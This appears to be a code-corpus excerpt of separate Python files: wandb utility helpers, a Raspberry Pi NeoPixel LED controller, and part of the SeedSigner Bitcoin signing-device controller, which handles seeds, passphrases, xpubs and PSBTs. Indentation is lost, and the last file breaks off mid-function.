or "kaggle_environments" in sys.modules # noqa: W503
)
def _is_likely_kaggle():
# Telemetry to mark first runs from Kagglers.
return (
_is_kaggle()
or os.path.exists(
os.path.expanduser(os.path.join("~", ".kaggle", "kaggle.json"))
)
or "kaggle" in sys.modules
)
def _is_databricks():
# check if we are running inside a databricks notebook by
# inspecting sys.modules, searching for dbutils and verifying that
# it has the appropriate structure
if "dbutils" in sys.modules:
dbutils = sys.modules["dbutils"]
if hasattr(dbutils, "shell"):
shell = dbutils.shell
if hasattr(shell, "sc"):
sc = shell.sc
return sc.appName == "Databricks Shell"
return False
def sweep_config_err_text_from_jsonschema_violations(violations):
"""Consolidate violation strings from wandb/sweeps describing the ways in which a
sweep config violates the allowed schema as a single string.
Parameters
----------
violations: list of str
The warnings to render.
Returns
-------
violation: str
The consolidated violation text.
"""
violation_base = (
"Malformed sweep config detected! This may cause your sweep to behave in unexpected ways.\n"
"To avoid this, please fix the sweep config schema violations below:"
)
for i, warning in enumerate(violations):
violations[i] = " Violation {}. {}".format(i + 1, warning)
violation = "\n".join([violation_base] + violations)
return violation
def handle_sweep_config_violations(warnings):
"""Render warnings from gorilla describing the ways in which a
sweep config violates the allowed schema as terminal warnings.
Parameters
----------
warnings: list of str
The warnings to render.
"""
warning = sweep_config_err_text_from_jsonschema_violations(warnings)
if len(warnings) > 0:
term.termwarn(warning)
def _log_thread_stacks():
"""Log all threads, useful for debugging."""
thread_map = dict((t.ident, t.name) for t in threading.enumerate())
for thread_id, frame in sys._current_frames().items():
logger.info(
"\n--- Stack for thread {t} {name} ---".format(
t=thread_id, name=thread_map.get(thread_id, "unknown")
)
)
for filename, lineno, name, line in traceback.extract_stack(frame):
logger.info(' File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
logger.info(" Line: %s" % line)
def check_windows_valid_filename(path):
return not bool(re.search(RE_WINFNAMES, path))
def artifact_to_json(artifact) -> Dict[str, Any]:
# public.Artifact has the _sequence name, instances of wandb.Artifact
# just have the name
if hasattr(artifact, "_sequence_name"):
sequence_name = artifact._sequence_name
else:
sequence_name = artifact.name.split(":")[0]
return {
"_type": "artifactVersion",
"_version": "v0",
"id": artifact.id,
"version": artifact.version,
"sequenceName": sequence_name,
"usedAs": artifact._use_as,
}
def check_dict_contains_nested_artifact(d, nested=False):
for _, item in six.iteritems(d):
if isinstance(item, dict):
contains_artifacts = check_dict_contains_nested_artifact(item, True)
if contains_artifacts:
return True
elif (
isinstance(item, wandb.Artifact)
or isinstance(item, wandb.apis.public.Artifact)
) and nested:
return True
return False
|
led_controller.py | from threading import Thread
from neopixel import *
from patterns import *
import math
class LedController:
def __init__(self, queue):
self.queue = queue
self.looper = Thread(target=self.process)
self.looper.daemon = True
self.pattern_runner = Thread(target=self.run_pattern)
self.pattern_runner.daemon = True
self.stats = {
'last_pattern': tricolor,
'active_pattern': tricolor,
'preferred_brightness': 80,
'preferred_color': Color(0, 255, 0), # Red
'pattern_running': True
}
self.strip = Adafruit_NeoPixel(145, 18)
self.strip.begin()
def run(self):
self.pattern_runner.start()
self.looper.start()
self.strip.setBrightness(self.stats['preferred_brightness'])
def process(self):
while True:
needs_restart = self.get_pattern(self.queue.get(True))
if needs_restart:
self.stats['pattern_running'] = False
while not self.stats['pattern_running']:
time.sleep(0.2)
def run_pattern(self):
while True:
self.stats['active_pattern'](self.strip, self.stats)
self.stats['pattern_running'] = True
def get_pattern(self, message):
return {
'power': self.handle_power,
'color': self.handle_color,
'brightness': self.handle_brightness,
'pattern': self.handle_pattern
}[message.topic](message.payload)
def handle_power(self, state):
print "handle_power payload: " + state
if "ON" == state:
self.strip.setBrightness(self.stats['preferred_brightness'])
self.stats['active_pattern'] = self.stats['last_pattern']
else:
self.stats['last_pattern'] = self.stats['active_pattern']
self.stats['active_pattern'] = no_pattern
return True
def handle_color(self, color_rgb):
r, g, b = color_rgb.split("_")
print "handle_color payload: RGB(" + r + "," + g + "," + b + ")"
self.stats['preferred_color'] = Color(int(g), int(r), int(b))
self.stats['active_pattern'] = static_lights
return True
def handle_pattern(self, pattern):
patterns = {
'static': static_lights,
'breathing': breathing,
'flag': tricolor,
'swipe': swipe,
'random swipe': random_swipe,
'rainbow': rainbow,
'rainbow cycle': rainbow_cycle,
'racing': theaterChase
}
print "handle_pattern payload:" + pattern
self.stats['last_pattern'] = self.stats['active_pattern']
self.stats['active_pattern'] = patterns.get(pattern, static_lights)
return True
def handle_brightness(self, brightness_percent):
print "handle_brightness payload: " + brightness_percent + "%"
brightness = int(math.floor(2.55 * float(brightness_percent) * 0.3))
self.stats['preferred_brightness'] = brightness
self.strip.setBrightness(brightness)
return False
def wipe(self):
for i in range(self.strip.numPixels()):
self.strip.setPixelColor(i, Color(0, 0, 0))
self.strip.show()
|
controller.py | # External Dependencies
import time
import re
from multiprocessing import Process, Queue
from subprocess import call
import os, sys
from embit import bip32, script, ec
from embit.networks import NETWORKS
from embit.descriptor import Descriptor
from binascii import hexlify
from threading import Thread
# Internal file class dependencies
from .views import (View, MenuView, SeedToolsView,SigningToolsView,
SettingsToolsView, IOTestView, OpeningSplashView, ScreensaverView)
from .helpers import Buttons, B, Path, Singleton
from .models import (EncodeQRDensity, QRType, Seed, SeedStorage, Settings, DecodeQR, DecodeQRStatus, EncodeQR, PSBTParser)
class Controller(Singleton):
"""
The Controller is a globally available singleton that maintains SeedSigner state.
It only makes sense to ever have a single Controller instance so it is
implemented here as a singleton. One departure from the typical singleton pattern
is the addition of a `configure_instance()` call to pass run-time settings into
the Controller.
Any code that needs to interact with the one and only Controller can just run:
```
from seedsigner.controller import Controller
controller = Controller.get_instance()
```
Note: In many/most cases you'll need to do the Controller import within a method
rather than at the top in order avoid circular imports.
"""
VERSION = "0.4.5"
@classmethod
def get_instance(cls):
# This is the only way to access the one and only Controller
if cls._instance:
return cls._instance
else:
raise Exception("Must call Controller.configure_instance(config) first")
@classmethod
def configure_instance(cls, config=None):
# Must be called before the first get_instance() call
if cls._instance:
raise Exception("Instance already configured")
# Instantiate the one and only Controller instance
controller = cls.__new__(cls)
cls._instance = controller
# Input Buttons
controller.buttons = Buttons()
# models
controller.storage = SeedStorage()
Settings.configure_instance(config)
controller.settings = Settings.get_instance()
# settings
controller.DEBUG = controller.settings.debug
controller.color = controller.settings.text_color
controller.current_bg_qr_color = controller.settings.qr_background_color
# Views
controller.menu_view = MenuView()
controller.seed_tools_view = SeedToolsView()
controller.io_test_view = IOTestView()
controller.signing_tools_view = SigningToolsView(controller.storage)
controller.settings_tools_view = SettingsToolsView()
controller.screensaver = ScreensaverView(controller.buttons)
controller.screensaver_activation_ms = 120 * 1000
@property
def camera(self):
from .camera import Camera
return Camera.get_instance()
def start(self) -> None:
opening_splash = OpeningSplashView()
opening_splash.start()
if self.DEBUG:
# Let Exceptions halt execution
try:
self.show_main_menu()
finally:
# Clear the screen when exiting
self.menu_view.display_blank_screen()
else:
# Handle Unexpected crashes by restarting up to 3 times
crash_cnt = 0
while True:
try:
self.show_main_menu()
except Exception as error:
if crash_cnt >= 3:
break
else:
print('Caught this error: ' + repr(error)) # debug
self.menu_view.draw_modal(["Crashed ..."], "", "restarting")
time.sleep(5)
crash_cnt += 1
self.menu_view.draw_modal(["Crashed ..."], "", "requires hard restart")
def start_screensaver(self):
self.screensaver.start()
### Menu
### Menu View handles navigation within the menu
### Sub Menu's like Seed Tools, Signing Tools, Settings are all in the Menu View
def show_main_menu(self, sub_menu = 0):
ret_val = sub_menu
while True:
ret_val = self.menu_view.display_main_menu(ret_val)
if ret_val == Path.MAIN_MENU:
ret_val = Path.MAIN_MENU
elif ret_val == Path.GEN_LAST_WORD:
ret_val = self.show_generate_last_word_tool()
elif ret_val == Path.DICE_GEN_SEED:
ret_val = self.show_create_seed_with_dice_tool()
elif ret_val == Path.IMAGE_GEN_SEED:
ret_val = self.show_create_seed_with_image_tool()
elif ret_val == Path.SAVE_SEED:
ret_val = self.show_store_a_seed_tool()
elif ret_val == Path.PASSPHRASE_SEED:
ret_val = self.show_add_remove_passphrase_tool()
elif ret_val == Path.GEN_XPUB:
ret_val = self.show_generate_xpub()
elif ret_val == Path.SIGN_TRANSACTION:
ret_val = self.show_sign_transaction()
elif ret_val == Path.IO_TEST_TOOL:
ret_val = self.show_io_test_tool()
elif ret_val == Path.VERSION_INFO:
ret_val = self.show_version_info()
elif ret_val == Path.CURRENT_NETWORK:
ret_val = self.show_current_network_tool()
elif ret_val == Path.WALLET:
ret_val = self.show_wallet_tool()
elif ret_val == Path.QR_DENSITY_SETTING:
ret_val = self.show_qr_density_tool()
elif ret_val == Path.PERSISTENT_SETTINGS:
ret_val = self.show_persistent_settings_tool()
elif ret_val == Path.CAMERA_ROTATION:
ret_val = self.show_camera_rotation_tool()
elif ret_val == Path.DONATE:
ret_val = self.show_donate_tool()
elif ret_val == Path.RESET:
ret_val = self.show_reset_tool()
elif ret_val == Path.POWER_OFF:
ret_val = self.show_power_off()
raise Exception("Unhandled case")
### Power Off
def show_power_off(self):
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Power Off?")
if r == 1: #Yes
self.menu_view.display_power_off_screen()
call("sudo shutdown --poweroff now", shell=True)
time.sleep(10)
else: # No
return Path.MAIN_MENU
###
### Seed Tools Controller Naviation/Launcher
###
### Generate Last Word 12 / 24 Menu
def show_generate_last_word_tool(self) -> int:
seed = Seed(wordlist=self.settings.wordlist)
ret_val = 0
while True:
# display menu to select 12 or 24 word seed for last word
ret_val = self.menu_view.display_12_24_word_menu("... [ Return to Seed Tools ]")
if ret_val == Path.SEED_WORD_12:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(11)
elif ret_val == Path.SEED_WORD_24:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(23)
else:
return Path.SEED_TOOLS_SUB_MENU
if len(seed.mnemonic_list) > 0:
seed.mnemonic = self.seed_tools_view.display_last_word(seed.mnemonic_display_list)
break
# display seed phrase
while True:
ret_val = self.seed_tools_view.display_seed_phrase(seed.mnemonic, show_qr_option=True)
if ret_val == True:
break
else:
# no-op; can't back out of the seed phrase view
pass
# Ask to save seed
if self.storage.slot_avaliable():
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Main Menu")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
### Create a Seed w/ Dice Screen
def show_create_seed_with_dice_tool(self) -> int:
seed = Seed(wordlist=self.settings.wordlist)
ret_val = True
while True:
seed.mnemonic = self.seed_tools_view.display_generate_seed_from_dice()
if seed:
break
else:
return Path.SEED_TOOLS_SUB_MENU
# display seed phrase (24 words)
while True:
ret_val = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, show_qr_option=True)
if ret_val == True:
break
else:
# no-op; can't back out of the seed phrase view
pass
# Ask to save seed
if self.storage.slot_avaliable():
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Main Menu")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
### Create a Seed w/ Image
def show_create_seed_with_image_tool(self) -> int:
seed = Seed(wordlist=self.settings.wordlist)
ret_val = True
while True:
(reshoot, seed.mnemonic) = self.seed_tools_view.seed_phrase_from_camera_image()
if reshoot:
# Relaunch into another image capture cycle
continue
if seed:
break
else:
return Path.SEED_TOOLS_SUB_MENU
# display seed phrase (24 words)
while True:
ret_val = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, show_qr_option=True)
if ret_val == True:
break
else:
# Start over
return self.show_create_seed_with_image_tool()
# Ask to save seed
if self.storage.slot_avaliable():
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Main Menu")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
### Store a seed (temp) Menu
def show_store_a_seed_tool(self):
seed = Seed(wordlist=self.settings.wordlist)
ret_val = 0
display_saved_seed = False
ret_val = self.menu_view.display_saved_seed_menu(self.storage, 1, "... [ Return to Seed Tools ]")
if ret_val == 0:
return Path.SEED_TOOLS_SUB_MENU
slot_num = ret_val
if self.storage.check_slot(slot_num) == True:
display_saved_seed = True
# show seed phrase
# display seed phrase (24 words)
while True:
r = self.seed_tools_view.display_seed_phrase(self.storage.get_seed_phrase(abs(slot_num)), self.storage.get_passphrase(abs(slot_num)), show_qr_option=True)
if r == True:
break
else:
# no-op; can't back out of the seed phrase view
pass
return Path.SEED_TOOLS_SUB_MENU
else:
# display menu to select 12 or 24 word seed for last word
ret_val = self.menu_view.display_qr_12_24_word_menu("... [ Return to Seed Tools ]")
if ret_val == Path.SEED_WORD_12:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(12)
elif ret_val == Path.SEED_WORD_24:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(24)
elif ret_val == Path.SEED_WORD_QR:
seed.mnemonic = self.seed_tools_view.read_seed_phrase_qr()
else:
return Path.SEED_TOOLS_SUB_MENU
if not seed:
# seed is not valid
return Path.SEED_TOOLS_SUB_MENU
if ret_val == Path.SEED_WORD_QR and seed:
show_qr_option = False
else:
show_qr_option = True
if not seed:
# Seed is not valid, Exit if not valid with message
self.menu_view.draw_modal(["Seed Invalid", "check seed phrase", "and try again", ""], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.SEED_TOOLS_SUB_MENU
else:
self.menu_view.draw_modal(["Valid Seed!"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
while display_saved_seed == False:
r = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, show_qr_option=show_qr_option )
if r == True:
break
else:
# no-op; can't back out of the seed phrase view
pass
if seed:
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["", "Saved to Slot #" + str(slot_num)], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.SEED_TOOLS_SUB_MENU
### Add a PassPhrase Menu
def show_add_remove_passphrase_tool(self):
ret_val = 0
r = 0
if self.storage.num_of_saved_seeds() == 0:
self.menu_view.draw_modal(["Store a seed phrase", "prior to adding", "a passphrase"], "Error", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
return Path.SEED_TOOLS_SUB_MENU
if self.storage.num_of_saved_seeds() > 0:
if self.storage.num_of_saved_seeds() == 1:
ret_val = self.storage.get_first_seed_slot()
else:
ret_val = self.menu_view.display_saved_seed_menu(self.storage, 3, None)
if ret_val == 0:
return Path.SEED_TOOLS_SUB_MENU
# continue after top level if to capture and store passphrase
slot_num = ret_val
if self.storage.check_slot_passphrase(slot_num) == True:
# only display menu to remove/update if there is a passphrase to remove
r = self.menu_view.display_generic_selection_menu(["... [ Return to Seed Tools ]", "Change Passphrase", "Remove Passphrase"], "Passphrase Action")
if r == 3:
# Remove Passphrase Workflow
self.storage.delete_passphrase(slot_num)
self.menu_view.draw_modal(["Passphrase Deleted", "from Slot #" + str(slot_num)], "", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
return Path.SEED_TOOLS_SUB_MENU
elif r == 1:
return Path.SEED_TOOLS_SUB_MENU
# continue if updating passphrase
# display a tool to pick letters/numbers to make a passphrase
passphrase = self.seed_tools_view.draw_passphrase_keyboard_entry(existing_passphrase=self.storage.get_passphrase(slot_num))
if len(passphrase) == 0:
return Path.SEED_TOOLS_SUB_MENU
self.storage.save_passphrase(passphrase, slot_num)
if r in (0,1):
self.menu_view.draw_passphrase("Passphrase Added", passphrase, "Right to Continue")
elif r == 2:
self.menu_view.draw_passphrase("Passphrase Updated", passphrase, "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
return Path.SEED_TOOLS_SUB_MENU
###
### Signing Tools Navigation/Launcher
###
### Generate XPUB
def show_generate_xpub(self):
seed = Seed(wordlist=self.settings.wordlist)
# If there is a saved seed, ask to use saved seed
if self.storage.num_of_saved_seeds() > 0:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Use Saved Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,3,None)
if slot_num not in (1,2,3):
return Path.SEED_TOOLS_SUB_MENU
seed = self.storage.get_seed(slot_num)
if not seed:
# no valid seed, gather seed phrase
# display menu to select 12 or 24 word seed for last word
ret_val = self.menu_view.display_qr_12_24_word_menu("... [ Return to Sign Tools ]")
if ret_val == Path.SEED_WORD_12:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(12)
elif ret_val == Path.SEED_WORD_24:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(24)
elif ret_val == Path.SEED_WORD_QR:
seed.mnemonic = self.seed_tools_view.read_seed_phrase_qr()
else:
return Path.SEED_TOOLS_SUB_MENU
if not seed:
return Path.SEED_TOOLS_SUB_MENU
# check if seed phrase is valid
if not seed:
self.menu_view.draw_modal(["Seed Invalid", "check seed phrase", "and try again"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Add Seed Passphrase?")
if r == 1:
# display a tool to pick letters/numbers to make a passphrase
seed.passphrase = self.seed_tools_view.draw_passphrase_keyboard_entry()
if len(seed.passphrase) == 0:
self.menu_view.draw_modal(["No passphrase added", "to seed words"], "", "Left to Exit, Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT])
if input == B.KEY_LEFT:
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Optional passphrase", "added to seed words", seed.passphrase], "", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
# display seed phrase
while True:
r = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, seed.passphrase, "Right to Continue")
if r == True:
break
else:
# Cancel
return Path.SEED_TOOLS_SUB_MENU
# choose single sig or multisig wallet type
wallet_type = "multisig"
script_type = "native segwit"
derivation = self.settings.custom_derivation
r = self.menu_view.display_generic_selection_menu(["Single Sig", "Multisig"], "Wallet Type?")
if r == 1:
wallet_type = "single sig"
elif r == 2:
wallet_type = "multisig"
# choose derivation standard
r = self.menu_view.display_generic_selection_menu(["Native Segwit", "Nested Segwit", "Custom"], "Derivation Path?")
if r == 1:
script_type = "native segwit"
elif r == 2:
script_type = "nested segwit"
elif r == 3:
script_type = "custom"
# calculated derivation or get custom from keyboard entry
if script_type == "custom":
derivation = self.settings_tools_view.draw_derivation_keyboard_entry(existing_derivation=self.settings.custom_derivation)
self.settings.custom_derivation = derivation # save for next time
else:
derivation = Settings.calc_derivation(self.settings.network, wallet_type, script_type)
if derivation == "" or derivation == None:
self.menu_view.draw_modal(["Invalid Derivation", "try again"], "", "Right to Continue")
return Path.SEED_TOOLS_SUB_MENU
if self.settings.software == "Prompt":
lines = ["Specter Desktop", "Blue Wallet", "Sparrow"]
r = self.menu_view.display_generic_selection_menu(lines, "Which Wallet?")
qr_xpub_type = Settings.getXPubType(lines[r-1])
else:
qr_xpub_type = self.settings.qr_xpub_type
self.signing_tools_view.draw_modal(["Loading xPub Info ..."])
version = bip32.detect_version(derivation, default="xpub", network=NETWORKS[self.settings.network])
root = bip32.HDKey.from_seed(seed.seed, version=NETWORKS[self.settings.network]["xprv"])
fingerprint = hexlify(root.child(0).fingerprint).decode('utf-8')
xprv = root.derive(derivation)
xpub = xprv.to_public()
xpub_base58 = xpub.to_string(version=version)
self.signing_tools_view.display_xpub_info(fingerprint, derivation, xpub_base58)
self.buttons.wait_for([B.KEY_RIGHT])
self.signing_tools_view.draw_modal(["Generating xPub QR ..."])
e = EncodeQR(seed_phrase=seed.mnemonic_list, passphrase=seed.passphrase, derivation=derivation, network=self.settings.network, qr_type=qr_xpub_type, qr_density=self.settings.qr_density, wordlist=self.settings.wordlist)
while e.totalParts() > 1:
cur_time = int(time.time() * 1000)
if cur_time - self.buttons.last_input_time > self.screensaver_activation_ms and not self.screensaver.is_running:
self.start_screensaver()
self.buttons.update_last_input_time()
else:
image = e.nextPartImage(240,240,2,background=self.current_bg_qr_color)
View.DispShowImage(image)
time.sleep(0.1)
if self.buttons.check_for_low(B.KEY_RIGHT):
break
elif self.buttons.check_for_low(B.KEY_UP):
self.prev_qr_background_color()
elif self.buttons.check_for_low(B.KEY_DOWN):
self.next_qr_background_color()
while e.totalParts() == 1:
image = e.nextPartImage(240,240,1,background=self.current_bg_qr_color)
View.DispShowImage(image)
input = self.buttons.wait_for([B.KEY_RIGHT,B.KEY_UP,B.KEY_DOWN])
if input == B.KEY_RIGHT:
break
elif input == B.KEY_UP:
self.prev_qr_background_color()
elif input == B.KEY_DOWN:
self.next_qr_background_color()
return Path.MAIN_MENU
### Sign Transactions
def show_sign_transaction(self):
seed = Seed(wordlist=self.settings.wordlist)
used_saved_seed = False
# reusable qr scan function
def scan_qr(scan_text="Scan QR"):
# Scan QR using Camera
self.menu_view.draw_modal(["Initializing Camera"])
self.camera.start_video_stream_mode(resolution=(480, 480), framerate=12, format="rgb")
decoder = DecodeQR(wordlist=self.settings.wordlist)
def live_preview(camera, decoder, scan_text):
while True:
frame = self.camera.read_video_stream(as_image=True)
if frame is not None:
if decoder.getPercentComplete() > 0 and decoder.isPSBT():
scan_text = str(decoder.getPercentComplete()) + "% Complete"
View.DispShowImageWithText(frame.resize((240,240)), scan_text, font=View.ASSISTANT22, text_color=View.color, text_background=(0,0,0,225))
time.sleep(0.1) # turn this up or down to tune performance while decoding psbt
if camera._video_stream is None:
break
# putting live preview in it's own thread to improve psbt decoding performance
t = Thread(target=live_preview, args=(self.camera, decoder, scan_text,))
t.start()
while True:
frame = self.camera.read_video_stream()
if frame is not None:
status = decoder.addImage(frame)
if status in (DecodeQRStatus.COMPLETE, DecodeQRStatus.INVALID):
self.camera.stop_video_stream_mode()
break
if self.buttons.check_for_low(B.KEY_RIGHT) or self.buttons.check_for_low(B.KEY_LEFT):
self.camera.stop_video_stream_mode()
break
time.sleep(0.2) # time to let live preview thread complete to avoid race condition on display
return decoder
# first QR scan
decoder = scan_qr()
if decoder.isComplete() and decoder.isPSBT():
# first QR is PSBT
self.menu_view.draw_modal(["Validating PSBT"])
psbt = decoder.getPSBT()
self.menu_view.draw_modal(["PSBT Valid!", "Enter", "seed phrase", "to sign this tx"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
elif decoder.isComplete() and decoder.isSeed():
# first QR is Seed
self.menu_view.draw_modal(["Validating Seed"])
seed.mnemonic = decoder.getSeedPhrase()
if not seed:
# seed is not valid, Exit if not valid with message
self.menu_view.draw_modal(["Seed Invalid", "check seed phrase", "and try again", ""], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Valid Seed!"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Add Seed Passphrase?")
if r == 1:
# display a tool to pick letters/numbers to make a passphrase
seed.passphrase = self.seed_tools_view.draw_passphrase_keyboard_entry()
if len(seed.passphrase) == 0:
self.menu_view.draw_modal(["No passphrase added", "to seed words"], "", "Left to Exit, Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT])
if input == B.KEY_LEFT:
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Optional passphrase", "added to seed words"], "", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
# Ask to save seed
if self.storage.slot_avaliable():
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
# display seed phrase
while True:
r = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, seed.passphrase, "Right to Continue")
if r == True:
break
else:
# Cancel
return Path.MAIN_MENU
# second QR scan need PSBT now
decoder = scan_qr("Scan PSBT QR")
if decoder.isComplete() and decoder.isPSBT():
# second QR must be a PSBT
self.menu_view.draw_modal(["Validating PSBT"])
psbt = decoder.getPSBT()
elif ( decoder.isComplete() and not decoder.isPSBT() ) or decoder.isInvalid():
self.menu_view.draw_modal(["Not a valid PSBT QR"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
else:
return Path.MAIN_MENU
elif decoder.isComplete() and decoder.isAddress():
address = decoder.getAddress()
address_type = decoder.getAddressType()
self.menu_view.draw_address(address)
self.buttons.wait_for([B.KEY_RIGHT])
validate_network = NETWORKS[self.settings.network]
validate_network_text = self.settings.network
if "main" in address_type:
validate_network = NETWORKS["main"]
validate_network_text = "main"
elif "test" in address_type:
validate_network = NETWORKS["test"]
validate_network_text = "test"
r = 0
if address_type in ("Bech32-main", "Bech32-test") and len(address) == 62:
r = 2
else:
# check single sig vs multi sig address
r = self.menu_view.display_generic_selection_menu(["Single Sig Seed", "JSON Wallet Desc"], "Validate Bitcoin Address")
if r == 1:
# validate single sig using seed
# No valid seed yet, If there is a saved seed, ask to use saved seed
if self.storage.num_of_saved_seeds() > 0:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Use Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,3,None)
if slot_num == 0:
return Path.MAIN_MENU
seed = self.storage.get_seed(slot_num)
used_saved_seed = True
if not seed:
# no valid seed yet, gather seed phrase
# display menu to select 12 or 24 word seed for last word
ret_val = self.menu_view.display_qr_12_24_word_menu("... [ Cancel ]")
if ret_val == Path.SEED_WORD_12:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(12)
elif ret_val == Path.SEED_WORD_24:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(24)
elif ret_val == Path.SEED_WORD_QR:
seed.mnemonic = self.seed_tools_view.read_seed_phrase_qr()
else:
return Path.MAIN_MENU
if not seed:
return Path.MAIN_MENU
# check if seed phrase is valid
self.menu_view.draw_modal(["Validating Seed ..."])
if not seed:
self.menu_view.draw_modal(["Seed Invalid", "check seed phrase", "and try again"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
if len(seed.passphrase) == 0:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Add Seed Passphrase?")
if r == 1:
# display a tool to pick letters/numbers to make a passphrase
seed.passphrase = self.seed_tools_view.draw_passphrase_keyboard_entry()
if len(seed.passphrase) == 0:
self.menu_view.draw_modal(["No passphrase added", "to seed words"], "", "Left to Exit, Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT])
if input == B.KEY_LEFT:
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Optional passphrase", "added to seed words", seed.passphrase], "", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
# display seed phrase
while True:
r = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, seed.passphrase, "Right to Continue")
if r == True:
break
else:
# Cancel
return Path.MAIN_MENU
# Ask to save seed
if self.storage.slot_avaliable() and used_saved_seed == False:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
#
# Validate if address from seed
#
# choose derivation standard
r = self.menu_view.display_generic_selection_menu(["Native Segwit", "Nested Segwit", "Custom"], "Derivation Path?")
if r == 1:
script_type = "native segwit"
elif r == 2:
script_type = "nested segwit"
elif r == 3:
script_type = "custom"
# calculated derivation or get custom from keyboard entry
if script_type == "custom":
derivation = self.settings_tools_view.draw_derivation_keyboard_entry(existing_derivation=self.settings.custom_derivation)
self.settings.custom_derivation = derivation # save for next time
else:
derivation = Settings.calc_derivation(validate_network_text, "single sig", script_type)
if derivation == "" or derivation == None:
self.menu_view.draw_modal(["Invalid Derivation", "try again"], "", "Right to Continue")
return Path.SEED_TOOLS_SUB_MENU
self.menu_view.draw_modal(["Checking Address", ""], "", "")
version = bip32.detect_version(derivation, default="xpub", network=validate_network)
root = bip32.HDKey.from_seed(seed.seed, version=validate_network["xprv"])
fingerprint = hexlify(root.child(0).fingerprint).decode('utf-8')
xprv = root.derive(derivation)
xpub = xprv.to_public()
for i in range(500):
r_pubkey = xpub.derive([0,i]).key
c_pubkey = xpub.derive([1,i]).key
recieve_address = ""
change_address = ""
if "P2PKH" in address_type:
recieve_address = script.p2pkh(r_pubkey).address(network=validate_network)
change_address = script.p2pkh(c_pubkey).address(network=validate_network)
elif "Bech32" in address_type:
recieve_address = script.p2wpkh(r_pubkey).address(network=validate_network)
change_address = script.p2wpkh(c_pubkey).address(network=validate_network)
elif "P2SH" in address_type:
recieve_address = script.p2sh(script.p2wpkh(r_pubkey)).address(network=validate_network)
